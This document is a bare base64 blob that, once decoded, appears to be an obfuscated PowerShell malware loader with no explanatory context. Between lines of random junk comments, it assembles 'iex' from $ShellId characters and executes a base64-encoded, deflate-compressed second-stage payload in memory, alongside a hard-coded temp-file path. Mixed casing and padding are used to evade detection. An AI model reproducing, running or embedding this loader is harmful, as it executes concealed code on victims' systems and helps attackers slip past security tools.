gA3AG4AbAAzAGUAcgA2AGcAMQB0AFYAMgAmAHoAewBAAE0ASwB6AFUAJABLACwAZgA6AE0AZAANAAoAIAAgACAAIAAjACAAbAAtAHoAeAB8AGEAPgA5AC0AOQBwAGcAKABvAGEAKgBHAHsAJAB0ADIAZABUACYAPAA5ACQAWwAhAD4AOgBqAFIAcwB8AEIATwB6AEwAdwBGACoAQQA9AEsAVwBYAEwAUgBwAFQAPQBtACwANQAxAHkAMgB7AGIANwAwAD0AUAAtAGYAcABOAFsAIwA5ADsARQBfACQANQBhAFYARgBIAFIAVQBxAFsATQBhAHkAOQAxAGsAbAB8AD0ATABkAFAAZwBJAEwAWwB8AFIARwBpACEAXwBHAEIARgBnACEAPwBfAG8AZAA3AHMAawB7ACAATgAuADEATQBSAHMAQwBYAHAAfAAqADEAbQBDAG8AdgBIACUAfABhAGwAWwBYADAARwAmAEMAUAAhAEkAKwBVAD4AaABPAFIAMAAxAE4AWQBeACYANgB0AE4AMAAxAGMAYQBKAFQAYgAuAGgAaABsADwALQB1AHQAJgAsAEIASQBdAHcAKwA7AHgAaAAzAHcAbgAzACsATgA5AEEAPgBLAEMAaAA8AFkASAAwAFUAZgBqAF0AZQBvAFAAZwB8AHgAWwAmACsANwAgAF8ATwBzACQAZwBxAFIAbQAyAHwASwBtAF8AYwBhAG0AIABVADwAYQAzAEgANgAjAG8AaQAlACgAawBBAH0ANQBQACMAdgBJAEcAVABpAGgAZABWADoAZQA3AFEAdABhAHYAKQBFAGQAaABjAFIAJgA0AEoAfQAgAF4ATABoAHUATgByACgAIAA7ACUAXQAhAG8AZQByAD4AKgA9AG0AYwAoADkAKABGAC4AJABUACMANgA8AGoATQBKAGgAaQAgAGgAawBtACoALQB4AEMAKwBYAF8AMwBRADUARQBHAE4AMwAsAEYARgB0AFQAPgBqAFkARQA9AEMANwB6AEsARgAhACwAPABFAEMAKABmACsALABvADUAVABjAHsANQBkAHkARwA8ADcAZgBHAHwAJQBrAFIAVwBOAFQAZQBVADEAfQBOADkAMAB1ACUANgBJAFsAVQB1AEUAOgA3AD0AewBtAHgAbQAoADcAQQBdADgASgB6AG0AUABrAHwAIQA3AHAAVQBRAFAAZABPAE0AMQA9AHkAdQA2AHoAcgBwAGcAMQBiAG8AaAA8ADkAbwBWAEQAYQBdAH0AQwAmAEwAaABZAEMARwA7AFkATAB9ADgAbwAkAGsAcAA2AHYASwBvAEwAawBKAEYAWwAsAFsAJAA0AHcAMgAuAE4AJgB4AHsAZQBSAFAAIwBWAEwASwBTADcAVwB7AHAAaQB7ACEAMQBXAGEAZABWAF8ATQA9AEoAbQBpAEEAMwBfAGUAYQBrAFcAKQB4AFcAOgBoAFsAYQAyADoAMQAzAHIAegBzAEgASwBDAG4AWgAoAE0AWABCAGgAfABmAEAAJAA4AEcAUwBHAHsAQgB6ADQARQAzAEUAcAA4AGQAQQB9ADsATgA3ADMAVABNACUAZgAuAGsAIQA/ADkAeQA2AHgAdAB8ADEAUAA+AE8AcgA8AGkARAA2AGQARgBlAD8ASwA7AEgASgBjAE4AWQAwADYAUQAzAG0AbQBQADcAegBRAFkAPABqACoAKQA/AFUAJgA2ADcAOQAwAEkAfAAzADUAbwB9AHcAdwAmAFQAPABNAG8AMwBmAGYANgAyACwASQAjAGcAUQBmAFMAegB6ADQAKwB6AFEALgBiAGkAcQBFAGcASwA4AG4AUwBSACUAUgB3AF0AdgBXAHsAbQBvADIAfQBaAH0AMQA3AC4ATwA2AFMAcwBsAHcALAAkAEMAagBZACEAcQA1ADoAKQAuAGQAeABGACMAaQAkAGMAYgAzAGsAIwBDAD8ANwA/ACsAdABOAHAALAAmAEUAPgBOAHUAIQBKACAAXgB9AD8AYgB2AEUAOgBoAD4AeQBzADkAYwBUAE8ASwA5ADYAOgBXAFYALgA6ADEAOAAhAEYATwBHAFoAKwBmAGgAfABQAG8ARABtAGQAKABmAC4AIABCAEkAcABNAEkADQAKACAAIAAgACAAIAAgACAAIAAkAGEAIAA9ACAAIAAgACAANgAxADgAMAA7AA0ACgAgACAAIAAgACAAIAAkAGIAIAAgACAAIAAgACAAIAAgAD0AIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwADUANAA5ADUALgB0AG0AcAAnADsAIAAgACYAKAAgACAAIAAgACAAJABzAGgARQBsAGwAaQBkAFsAMQBdACsAJABTAEgARQBMAGwASQBEAFsAMQAzAF0AKwAnAHgAJwApACgAIABuAEUAdwAtAG8AQgBqAEUAQwBUACAAIAAgACAAIAAgACAAIAAgACAAcwB5AHMAdABFAG0ALgBJAG8ALgBDAG8AbQBQAFIARQBTAHMASQBPAG4ALgBEAEUAZgBsAGEAVABlAHMAVABSAEUAYQBNACgAWwBpAE8ALgBtAGUATQBPAFIAeQBzAHQAUgBFAGEATQBdACAAIAAgACAAIAAgACAAIABbAGMATwBuAHYARQByAHQAXQA6ADoAZgByAG8ATQBCAEEAUwBFADYANABzAHQAcgBpAG4ARwAoACcAcABWAFQAUgBiAHQAbwB3AEYASAAyAHYAeABEADkANABpAEkAZABFAE0AcwBpAGoAYQBKAHEASwBJAHAAVwBHAGQAcQB2AFUAYQBoAFYAMABXAHoAWABFAGcAMABsAHUAUwBUAFQASABqAGgAeQBuAEQAUwB2ADcAOQA5ADAAawBaAG8AVQB1AEcAMABWADcAaQBlACsATgA3AFgAUAB1ADkAVABuADIASwBBAHkANwB0ADYAcwBVAFMAUABVAGQAdwAzADAAcwBZAHgATQByAFMAVQA3AGIAcgBhAE0AOABpACsAVwBTAFQARgBlAFoAZwBXAFIASQB0AHIAUABlAEoASgBjAG0AVABxAEIAMwBLAFEAMQBvAGwAVQA1AEIAUAA4AFEAQgBaAE0AUABXAFUAWgBvAHYAUgBCAHkAUQBRAFAAQQBzAEkAMwBkAFAASgBGAEEAeQBNAHkAUwBQAHAAUwBFAGoAagB4AFcATQBzAFQANAA5AEsANABNAEIAWQA5AFMAdgAvADcAeQBuADQAeQByAG8ATQAzAHAAZQBCAFcAOABaAEkAcwAzAEcAUQBsAHcAbQBxAGQATABHAGEAWAA4AEgATABVAEUAYwA5ADkAdgB1AFAARABQAGMASQBBAEUAVQB5AEMAdwBKAEYAbgBCAGoATgBQAG0AVQBnAHIAegBSAEMAawB2AEkAbgBJAHEAcgBvAEEAdQBsAEIARgBuAFIASwB2AHYAaAB2AGgAYQB2ADIAdQBVAEwAbABjAEYASABMAGsATQBCAGoAaQBVAG8AWABvADEAZwBOADMAeQBKAHQAYwBtADUARwBBAG0AaABnAHYAUABpAE4AdwB5ADEAdwBhAGEAdwBlAHUARAAxAHMARABpAHMAegBLADgANgBOAG0AQwA3AHYAbwBaAEUANgBWAFUARAB6AFcASgBsAFkARABaAC8ASgBsAEsANQBWAGUATgBBAE0AdABzAFAAMABoAGsASQBUAEcATgBIAG4AMgAzADAAMwAxAHcAWABJAHMAKwBpAFMALwBTAE4AegBvAFAAUwBqAFQANABQAEkAdgBnAFgANABhAEgAaQArAEIAcQA0AGcAUQBtAGUAbQBZAEgAYgBDAEoAUAB3ADcAdwBMAFoAbgBHACsAQwBSAFQAMABSAGIAUABMAFEAZgBYAGEAOQBKAGEAdQBhAG0ATgBSAEcAVABEAGMASwBoAE8ANgBUADMAUgBGADUAMgAzAFkAZAByAGMALwBXAC8AbgBxADgAUABxAGYAMwBYAEcAUgBBADAAeABJAHYAdgBuAGMAaQB6ADYAdgBYADkANwA3AGgARgBYAE0AMQBtAEIAdwBiAHEATgBZAE0ATABWAEQAaQB2AFgAQgBaAFIATABlADIAMABLAG8AQQBOACsAeABkAGcAVgB5AGEAaQBMAEwAaQBHAE8ALwBhAG0AaABWADkASABEAEEAYgBNAE0AdQBVADcARABJADkAYgBkAHMALwBjAG8AYwA3AHoARAArAHIAcAB0AFMAUQA0AEwANAAzAGYAMwBnAGkAbwBnAGwAMQByAEMAcgBiAHgAQQBOAFcAZQBVAEcANQBlADgARAB4AHoAUwBuAGgASAA0AGMAbABlAG8ATwA5AFMALwB6AHcAWgBWADgAbAA4AHUATgArADUAQgBLAHkAMgBWAGkATgBWAGUAOABIAHQAQwBJAFkAcgA4AEYATgB1ADAASQB3AEoATgBqAE4AdAA4ACsANwBGAHMARQBjAEkAawBMAHoASgBIAGEARgBjADEAaABaACsANQBSADAAcgA3AGgAYwA1AG4AdwBKAHgASgA5AEcAWABLAGUAdABvADAANwBvAHoAWAB3AGwASAAwAEMAYgArAGMAbgBKAGgAVgBiAEoARwBjAC8AZwAzAFcAQgBxAE4ARAA3AHMAagB2AE0AQgBUAEIAZgBuAEQAYQBBAEEAMwBRAGwALwBKAEoAMgBGADYAKwBLADEAdQBzAFAAVgBFADIAZABXAG4AdgBsAHgAZgA5ADcAaAB0AEIAUABpADcAMQA4AD0AJwAgACAAIAAgACAAIAAgACAAKQAsACAAIAAgACAAIAAgAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAG4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACkAfAAlACAAIAAgACAAewBuAEUAdwAtAG8AQgBqAEUAQwBUACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBPAC4AcwB0AFIAZQBhAG0AcgBlAGEAZABFAFIAKAAgACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQAgACAAIAAgACkAfQANAAoAIwAgAGsAJgBdAD0AQwA4AD0AZgBVAGMAcwBBACMAKgB9AGcAXwB0ADMAQgBmACEAKQAuAEAAdABHAHEAWAAsAE4AXwAuADsAMwBVAHEAYQBvAHAAQgAtAFIAUwBGAHYAagBzADIAdwBmACQAQABNAGgAZQBEAEAAJQB9ACYAZgAtAHIAbwAzADsAJABrACgAOAA8AGgALQBeACUAcwAlAGsALABYADQAeAA9ACwAawBPAHwAJAAqAFYAcQAsAHcAIQBPAFIAdQAzACMANwBaADwARwAjAFMAcgBuACkASQBWACsAPQAlADQARwBIAEQAMAB0AFYAMAArACEAKABuADwAdwBMAHwAKgBwADcAawAxAGMAJQBQACUAMgBCADYASwBVADcAeAAhAG8AXQBhAFgARABJAGIAKQAoAG8AIABRAFIAQgBhAGwATQBvADAAOQBlAG8AbgAxAFgAKQAwAGQAMQBVAEMAJQA4AGUATgB5AFgAcgA9ACMAcgB7AFgAdwBwADUAewBUAGgASABYAHcATwBPAHQANgAoADQATQA4AH0AQgBLAE4AdABhADcAYgAqADcAdABxADcAWgBoAG4AJABaAH0AeQBOACAAdwBOADsAbABIAEUAbABnAG4ARwAgAFgAWwBSACgAKwAsACMAXgBuACkAUwBVADwAcQBmAGUAcQA9AFsALABFAHQAaQBaACYAQAB3AHkAJgB8ACMAVwB9AHAAaABQAFYAbABDAD4AWgA0ADAAIABXACgAXwBbAD4AQABLAEUAOABdAG8ANQBUAD4AewAyADEANwBMAA0ACgAgACAAIAAgACAAIAAgACMAIAAhAFMAUAB4ACQASQBPAGoAdwBlAGcATQAoAHIANwB5AEIANwB8AEAAaAAgAFQAdABVAG8AMQBIADcARAA8ACEAOAB5ADsAJABhAFcAJgA/AHYAKgBUACkANAAuAEoAPQBjADkAMAAmAHMAWwBWAG8AXgBjACAAawAzAEsASABZAFcAIAA5AE4AagBLAFQAVgBvAFIAWgAsACgAMwBlACwAdgBJAFcAZwA9ACMAQQBBAFMARAA/AE4AeQB1AEQAWQAlAGMAOAA1ACgAZABAAE4ATwA5AH0ATgBaAHgAbwB4AG8ATgAtAG8AcABlAHQANwBPAG8ASQBAAHMAcQAgAFQAUgB5AEIAXQAqAHcAOQAxAE0AUABbAC4AVgB8ADcAQwAuAGoAMAAsADsAIQBqAGUAWABfACgAPABXADIAXwAsACwAYQB0AHoARgBpAHoAPQB5AF0AWABVAEMASwAtAHcAKgApACoAfQAhAGEATQBaAHwAewB6AHQAOwBOACUAdABiAGsAPwBrADgAPAA9AFgAdABtAFYAWwB8AEwASABAAHMAZQBNADcAbwBfAHcAdwAmAGEAPgBwADIAcwA2ACQAPwB2ACkATgAjAEsAYwBaAHQAegBbAHYAbwA6AEIANABpAFYASQAuAFAAQQBkAHUAZgA+AFUAVAAuAEwAPQBYAE0AUQAlADgAQwAyAGIANQA0AHIAegBmAEcAbwA+ADMAbgAoAHAAPwBoAFEAPwA0ACEARwA5ADEAZwBSAFUAMwA3AH0AQgBvACUAPwBtACsAaAB0AG0AfQB4AG0AYwBEAHIASwBNACkAMQAyAH0AfAAwAC0AewBeAEAAYgAjAD4AfABiAEUAIQBbAHYAPgBDAFQAUgBzAEUAYwBdADMAIwAxAFIAJQAwAHAARgBzAHIAWgAzAF4AIABMAEEAcwBxAFcAYgBjACoAdQBsAFEAYgBYAEUALgAgAC4AIwBLADsAPAAkAEgAJQBRAHwAaQA0AEgAcwA+AF4AVQAqADkAXwAyAHUALAB9ADQAVgB2AHwAdQBvAGcAIABlAEcATABBADMAZgBsACEAWQBRAGoAXwBmAEcAbwBMAHAAMABXACMAQgBlAHwAQgB6AEcAdwB6AD4AMgAmAGoAbwBFAG4ASQAoAHMAbQBNAGcAYwBPAGkAbwBAAFAAcAAhAFsAfABZACgASgAoAGMAewBOAFcAaQBnAGgAVQAzAHIASABaACYAbwBmADEAZQBrACsAOQAxAFQAcQBjAHIAJgBYADQAVQBdAD0AQAB9AHEAdQBaAHUATQBxADoAfAB1AGsAcgBQADAASAB6ACgAPAA4AFMALQBuAFYAVgBJAFEARAByADgAQwBCAH0ARgB4AFIAJQA1AGoAVAA/AGcAVQAqACsAbABqAC4ASwBJAEEAawA6AFIAVwBkADIAZABzAHMAbgBSAHsAXwAqAE0ANwAwAFQAbQBhACMAZwBEAHcAegA/AEoAQwAwADkAbwBJAHUAdwAhAGwASgBkAEcAUQBZAFIAMwBsAFQANgArADgAawBXADIAVQBQAHIANwB5AEMANwA4AHwAJgB4AEgAcwB4AC0AeQBDACgAcwBhAHAAcABjAC4AegBAAEUAWgBNAFIARABlAD0AIwBIAHoANgAhACUAbABsAGQAcABJAF0ATwAwACoAMAA/AEYAJAAtAHYAbwBfADgARABGAC4AQQBAADkADQAKACAAIAAgACMAIAA8ACsANgBNAEkAKgBDAHMAYwAwAD4ARwB2ACoAMwBPAGoANgBVAEIAJgBkAEEAZQBrAEwAbwBFAGsAMgBAAFAAIAB9AHEATABvAHsAKwBNAD4AZQBYAG0AeQArAE4AZABMAFUARABkAF8AYwBXADcAVQA6AHAALQBGAF0AbwA4AEMALAA3AH0AXgBqAC4AbwBPAD4AWgBBAGwAMwBpAFsAbgAoAFsAVABVADkAagBxAHQAPQBIAFAAQwB4AFsAJgBmAEUAZwB8AEkATAAmAEIASABfAHUAKgA1AE8AOQA6AHcAKAA0AFQAUQAwAHQAJABaADEALgA4ADoARgBdAHUAVwA5AHMAcgBHAD4AMAA6AFEAIQBPAFoAdQBJADgAcAB9ACEAdQAhAGwAMgBqACQAPgBxAEQAaQB4AH0AbgBKAGkASABNAD4AUQBEAFoAMABWAEUAPgA8ADkAdwA3ADIAMQBlAGwAIAA2AHgARABhAEkAYwBMAF4AYgBhAHgAOwAsAFgAMgBIAGwAbQA5AHMAOgBkAHcAbwAyADsALQApAFAAPwBmAEMAVQAkAHgASAAlACQAMABtAD0AcgAlAEwAaABsAGUAWABfACQAQQBlACkATgBOAHkAaABmAHIAUwB0AEkAYgBNAG8AYwB5AGgASwBlAFoAcQBDAEcATAA0AEIAIwB3AD8AeAA/AFQAJgBoAGQAdwB3AHwAIQB5AEUAXwA0AH0AdQB5AHUAbAAmAHUAKQAxACMAdwBaAF0AbABjACgANgAtACoAIAB1AGQASwBnAEoAOABaAHkASgA9AFgAOAA2AE4ARwA5ADkARwA+ADQARQBCAD0AMgAjAGoASABCAC4ASQBzAHMAKgAmAGMANQAqADYAKQBCADUAegBdAGYAMQB6ADkAPAAlAEQAJgAzACUANAAhAHcAPgBvAFYAZABBAGYATQA4ACgAOAA5AGgAVwBnAHIAZwBwAHAAeQBJAFkAKQA+ACgAMwBJADAAKABHACgASAA/AGQASwBdACoAPQBkAEwATQBNAD0AJQA3AFgAQQBJAFIAWwBvAFoAKQAmAFcATAAoAGgAawBqAEUAaABGADwASwBxAEYAewAyAGkASgAuAFEAZQBRADgAdQBnAE4AcAA3AEoAbQB7AG4ARgBpAHcAUQA7AHYAcgAjAF8ANwBxACAAXgBHACkAVABUAE8AeAByACgANwA9ADMAYgBaAFUAPQB6AC4AMABtACQATwBEAHEAZABvAF0ATQB6ACgATgAjAG4APgArADkAYwB8AEcAJgAyAHwAUAA1AEIAeAA/AFQASQBoAF8ASABbAEEAcwA6AEcASwBaADAAYwA2AGUAMgBIACEAJABHAFAAdwBvAF4AMQAuAHgAcAAoAFUAeABNAFgAaQBmAFcAdgAxAHwAXwBoAG4AUQBUAEYAWQBSAFQATgBVADgAewBeAFoAZAB5ACYAcQBDAG8APgBDAD0AXQBeAEIAbgAuADYAOwBbACUAbgBYAGEAKgB0AGcANQB8AFYAKQBMAG0AKQA2AHcAawB3ADEAYwB6ACsAOQAtADAASQA2ACUANQBSAEUAPABFAHUALgBtACMAawBPAGQASQB8ADoAQABBAEwAMwBmAFQAdwBIADIAQQBYACQAdQB0AD8AZAAmAEoAbQA0ACgAawBYAF0AMQBhACAAOQB2ADEAQgA7ACsAewBKADwAbQBaAH0AYQBXAEcATwBhAFIATQB5AE8ATQBZACMAMQBZACUAXgBMADQAOwBQAHsASwB6AFMADQAKACAAIAAgACAAIAAgACAAIwAgAEUAYwA1AFkAegBfAC0AegA0AG0AKQBTAF0ARQAhAE4AJQBTAC4AIABqAHYAQQAxACMAQwBiAEUAPwBiADcATgA5AGwAbgBfAEkALAAkAGwAJgB6ACgAPABxAHYAVQA6AHUAdQBHAEgAcwBKAGEAOQBMADgAPQBoAE4AUwB0ACAAQwBlAHYAZQBqAD0AUgBhAHUAJgB6ADcAVgBhAEgAVABdADkALABhAHUAaAAwAHgAegB1AC0ALgBAAE4ANgBtAFsARwBQACAAVgBwAGEAIwB6ACEAPgBDAFgAIwBsACUAZwB9ADkAagAzAEcAZwBzAEQAPQBFAEYARQAzAEgANAAwAGgAbgBnAEEAMwBqAE8ARAA+AFsAbwBWAHcAbABbAG0AWAB9AGgAMQBAADYALABIADoAWQAxACUAbgB8AE8AWgB5AGsAWQAhAG8AdQA1AFQAPQB6AEsAMQB9ACUAUwBdAHwAaQBVAHkAeQBNADwAMgBjAC0AIAB3AGUAKABLAFIAOQA2AGEAQwB2AH0AdQBaAGoAZQAkAHMAaQBQAD0AVwBsACkAQQAhACwAZQBaAHEATAB3ADsAVwBdAEYAdgAwAGUAeABbAEsAfAA7AHQAZwBYADQAYwBnAFkAWABhAFkARABoAEsAcABsAFoAZgBaAEkAJQB5ADEAfABUAD4ATQApAHIAbABOACAAfQA0AEwAIQB2AF8AZAAwAGcAMgBOADQAPwBYAGEAOwB0AD8AbABoACAAQwAmAGwAXwBzACMAaQBsACkAXwAxAGUAPQAoAHMAJQA9AEUAZwAwAEEAMgBGAFEAfQBfAE8AdAArAGgAIwBvAF4ALABTACoAOABFAE4AcAB4AG8AUQAhAFQAZgBaAFQAPwBsAHgAcwBjADIAZgBiAGwAZwBDAFQAUwBHADkAZgBdAFAAXwAwAFEAQAAoAEgALgBOAHcAUgA1AFgAUgBPAC4AdQBbAFUAJQAyAEAASgAzADQARgBiADYALgBSADUAaABmAGEAYwBPADQAVQBzAHMAOgBBAEoAKABXAHQAKABvADcASwAoAFQAbwBZAGIALABZAHwANgBvACUAVwB4AF0AIwAuACkAYQB0AHYAPgBFAH0AKQBRAGMAXgBsACEAeABPAF0AZQB8ADMAXQA8ACkAeABSAHkALgAwAGUARgApADoANABAACoAcgBMACUAOgAhACUAfABfAGcAWgBaAEkAMgByAHEAeQB1AGUAUABHACoAdAB3ACQAUQArAD0AUgBnAFoATQBiAEEASQBpAEQAWQB1AHcAYQB7ACEAUAArAEkAXQBaAEwATgA7AHUAdQAhAG4AVQBGADQAXQB6AGEAPwBTAFEAMwAqAHwAMQBxAEMAIQAyAF8AegBCAEgAewA2ADcAUgB8ACwAcABxAGgARwApAE0AQABCAGkAcABEADsAdABMAE8AJABjAEoAfQAoAHsAPwBXADQAdQBEADcASgB5ADcAfABPAGQAVgA5AEQAcwB1AG0AUABQAD8ALABfAEAAOwBIAG8ASwBjADoAbQA3ADwAawAtACgARwB1ADMARABuAE4AWwArAFAAcwAqAHIAUABqAFIAawBhAGUAVwBwAEAAQwA9AGMAKgBIAFcAPwA2ADAAaQBUAFQAawBdAHYAbQAzAD8AZgBsAG8AYgBiAGQASwBHAEsAUgBbAFsAeQB8AFkAcgAgAEoAeQBJAEwASAB6AFMAdwBBAGUARwAxADkAdwBTAEMAJABdAC4AKwBSAHoADQAKACAAIAAgACAAIAAjACAAbQBEACkAeABXAC4ASQBMAGcAZQBUAF4ANABTAHAATgA0ADgASABmAEwAcABMAHAANwBkADoAXQBYAEUATwBtAEgANgBPAGIAbQAmADEALAA3AEoAWwA0ADAAcgBmAE8AUwAqAG4AKgB3ACkATABBAHAATgAqACsAOwBiAD0AMABZAGIAXwAxAHkAWQBFAGkAOwBXAE8AVAAqAD0ATQApAEcASgBiACMARABzADEALAB7ACwAbwBoAD4ALQB4AEIAewBCAEAASQA6ADsARQBIACsALgB0ACEARQAuAGwAKgAhAFYAIAB1AFYARABAADcAVQA1ACQAWQBpAH0AZgBDADwAZABYAEcAPwByAGgATABBAE0ANwAqAD4AeQBYAC4AYQBTACYAIQBrAFsARwBzAEYAPQBCADgAYQBEAGQAbAB8AGcAMAApAEAAPwBkADAAIwA1AE4AQABxADAAeAAhAF8AKQA0ADYAPAB0AHcAYgAlAC0AaQB8ADcAJQBSADwAeQB3AEwAIQBRAD0AKQB0AHwAUgBSACUANgBFACEAYwBwAEAAWABtACgAawBTAGsAUAA0AG4APwAuAHMATgAhAFgAZAB6AFAAWgAyAHMAKAB9AEIAbAAhAGIAfQAlAF8AMABLAEIAewBQAF0AQgB7AHwAUwBFAFcAbgBiADEAfQAxAFUAPwBeAEwAewAlACUAYwBXADcAQAB0AGkAbgAuAF8AfABxAE8AQQA6AC0AKwBwAEoAfABSADwANQBXAFcAUQBlACkAUAAuAGsAegBaAHQAdwA0ADsAPQBsAFIANwAjADkAdQA7AEwAbwA5ACUAfABmADYAPwBBAEYAVwBsADYARgBlAGkAZQBlAEkAaAAzAG4AVQA2AHQALQAwAGkANgBjAD4APABeAEUATwBXAD8ASQBQAFEANQA0AGsAYgBbAE8AKwA6AFoANQBYAGwAJAAwAC0AZQBEAFAAXwBbAGYAaABDAHkAcABQACMAWgB7ADcAZABZAE0AOgBkAF4AZwBdAEAAagB8AEYAUwAqAGwAbwA7ADYARwBzAG4AcQAyAD8AfQB4AHwATAByAEIAPgA2AGMAawBRAHEAagAgAHcAMgA7AHMAZgBWAD4AMABPAHoAWAA0ACQAWwBqADUAPwAuACsAQwBEACYAQgBJAHIANgBoACYASQAxACoALABDAEUAeQArADIAPgAgACAAYgBpAD4ATABOADQATgByADcAdAB4ACYASQAmAGcAIAAlAEsAOABRAEUAPgAtAEUAZgBWAHsAJgBGAFIAUgB0ACEAbgBGAFgAVgA8AEoAPABZAGsAWwB7ADQAVABUADMAYQAoAFAAdQAsAHgAKwBfAGoAZAB2ADcAWgA6AEoAKAA0ACQAegBIAEkASgB5ADYAXwAxAFAARwB1AG4AXwA+AFUAQgAhAFUAWwApADwARQA9AHgASgB3ACUANwBCAHkATwBGAHkAMQB2ACoAdwA7AH0AdwBhAEAAaABxAGsARwAuAC4ASQArAF8AOwBJAGUAZwBeAGcAQgA3AGgALgB4AEAAZAAoADAAcAAgADoAZgBVACEAewBxAHkASgB1AEYAWABPAD0AVgBIADsAUgBqACQAaQBPADYATwBqAFQASwBwAFMATwAtAHgAKAAtAFAAfQBjAGcALQB9AGUAQgBWAHIATgApAE0ASABwAGoAJQBFACsAQgAsAGYAdwAmADYAWwByAFIAewBlAEoAKgAlACMAZQB4AD4AIQB6AHkAZwAhAHAAOgBaADwAdwAhADQAVgBUAEoAQQB7AHMAdAAxAEgAYQB7AEEAcQAsAFAAWwAqAFoAIwA3ADQAKAAyACsAegBAAGYAXgBiAF0AQQAqAFQAKwB0ACoALABTADUAaABVAGcAdQAuAGEASwBKADgAdABFADIAfQA0AHIAbAA6AE0AKABBAG4AWgBdACMARwB7AFgAQQBrAHkAKwAwAG0AbAAmAEsAYwBxAC4AMwBOAC4ASgBdAGoAYgArAEgAVgAkAFcAPgBoACwAcgBFAGQAOQBNAFUAQgB6ACAAdgBWAC4AOABIAFYAaQBeAEIAcgB0AEcASABaACAAUABKAFgANgBmAGcAMQB9AHkAQwBxAEkAXQBHAFoANgBBAEoAXgAzAGEAKwBWAGkAaABeAGIAegA/AF8AWwBsAHAAewBoACUAKQBdAGIAcABLAH0AeABGAD4AewAzAFMANwA9AFkAdQBxAF0AeAA+AHIAIwA0ADkAbwA1AGkAUwA0AGIAegBmAFcAdwA5ACUAVAB7AFAAbwBoAEMAYQBwAEYAKwBsAEwARQBVAFMAQgAwAGkAWgBMAFoAMgBaAHgAUwBzADcAIwBJAHwAeQB3AHkASQA4AFQALgA2AEEAOwAsAFAAWgBOADEAKQAuAH0AIQBlAHAAVQBvACUAMwBlAGwAUQBdAEQATQB7AGQARgBHADsAcgBUACoAZABHAFsASgBTAGUAZgBnADoAVwBTADkATwBiADkALAB3ACMAaQBuADEAcgAjAC4AKwBJAFcAOwBnAHYARABPAFkAVAAjAC0AVwAyAFQALAB7AHsAbQA1AHEAYwBnAD4AVABJAGQAXgBVAFIAaABjAHIAPwANAAoAIAAgACAAIAAgACAAIAAgACAAIAB8AA0ACgAgACAAIAAgACAAJQAgACAAIAAgAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApAH0ADQAKACAAIAAgACAAIAAgACAAIAAjACAAewBmACYASwArADcAfQBWACEAZABUAGkANABtAF0AZwA1AGQAPAAlAEcAZgBiAEUAbwBqAGUARwBPADgAYgAtAHEAKgBDAGwAdwBUAEMARgBvAEUAKQB5AHQAOgAuAGkAXgBuADYAawA/AFYAWABAAHAAKgAzAGEASwBeAH0AdQB9AF8ASABhAC4AJQBTAG0AKwB5AGIATwBUAGcAagByAG4AWwBNAHgAcABRAEgAKABiAEkAWQBQAFsAKwAhADgAIwBVAHwAdgAuAG4AOQBuAGwAeAAmADwAOQBvAHMAYQBPAD4AaQA4AG4AcgBAACMARABsAHwAUwA0ACgAXQA6ACAAKwBvAHwASgBqAFUAaQBjAEkAbgBBAEkAZgA1AEoAbQBIACUAWgBbAHYASAAtAEoAXwAyAEAAYQB5ADYAPwBwAEgAZwA4AGIAIwBhADAAQQAjAGkAWABHAEUAWgBiAHoAYwBhAHkAOQA8AE4AOABHAHYAUABuAE0AaQBVAFMAUQBXAGMAYgA4AHMAPABZAFgAPwA0AF4AWwAkAEQAcwBbAHEAYQBSAE0ANQB8AEQAegB6AFoAUAB9AHsARQBNAHgAMQBRAHEASwBNACEAUwBMAFkAdABqAG8AdQBFAGcAWQBKAGkAeAAhAEEALABhAEgATgArAGsAMQBaAD0AcAAzADwARwAuAG0AewAwAA0ACgAgACAAIAAgACMAIAAsAE4AVABGAEkAWwA5AGoAPgAhAC4AYQBIAHAAXwBjAHkAMQB2AD4AIABaADEAIAA/AHsAagBxAGQAIAA5ACkAawA2AGsAZgAkAG8AYQAjAE0AdgAsAFUAQAB3AFEAegB6ACYAcwBvAFQAbQBhAGsAIABmAEUAJQB8AEoAJgBHAGcAZQA2AEMAKgBTAHQALgA8AHMAWAAwAGoAVwAqADYANgA2AD4ALABVAF8AcwAyAFsAPQA+AHsAMgA3AFsAcwAyAFsALQBlAHYAaQBmAC4AWQBKAEcAagBpAHEAXwA8ACEAIAB0AHEAXgB9AEMAOQBnAG4ARwA8ADYAbgBdAEAAbwA2AE8ARwBFAE8AMABjAF0AcAA0AEgAOgBSAGkASAB8AGwAfABfAC0AcwB2AFYAOQBxADUAOABVAFsAQAAjACoAMAB3AFsAeQB6ACoAaQBDAGIANgApAHcAQQBfACMAYgBQACgAWgAjAHYAdAAwAHYASABUAH0ASQBwAEMAPwA1AD8AfAAgAHAAMQBZAEgAUQBVAFYATAAgAH0ANABJAEAAbgAmAEoAcwBhACkAPQBwAGYATgAoAEEAJQB4AGwAMQBvAFIAWgA4ACQAYgAtAHEAVwA5AHMAeQB5AGIAKgA/AHEAbAAgACgASwBKACQAbgBLAGkAZAA1AG4AaAA6AFEAcwAkAGkASQAjAHoAZgBIAEUASQBMAEUAYQBwAFcAQwBfAFgAbQBMAHoAZQAtAE8AZQA+AF8ALABNAHwAIwBSAC4AJgA6AC4AdgBAACoAZgAsACYAVQAuAEIAQwAqADkAbgAuADgAUgAmAGkAWQArACUATABAAGoARQBkAC0AVQBmAFgAPwAmAFEAQQA8ACoAKQAgACUANwA9AHgASQBAADEAKABPAFMAKQB1AHcAeQB6ADsAIAB4ACMAUgBaADwAPABNAHYALAB0ADYAPwBhACgAXwBZAGwAQQAmAG8AZwBSACQAKQBEACsAYwBeAFkAcwB1AGYAVwBXADQARgA1AFUAZQBGAHEAOwAgAEMAcQAmAFYAcQA6AFYANwBjAFkASABuAFUAcAApAC4AIwAtAE8AWABkADoATgA/AFMANQBzAEcAagBpAC4ANwBxADwAPQB7AE0AcgBfADgAZgAqAEwAVAA4AFAAMwBAAGoATABuAC4AOQBLAG8AZwBbAFoAOgAsADEASQA4ACYAJQBCAF0AdgA8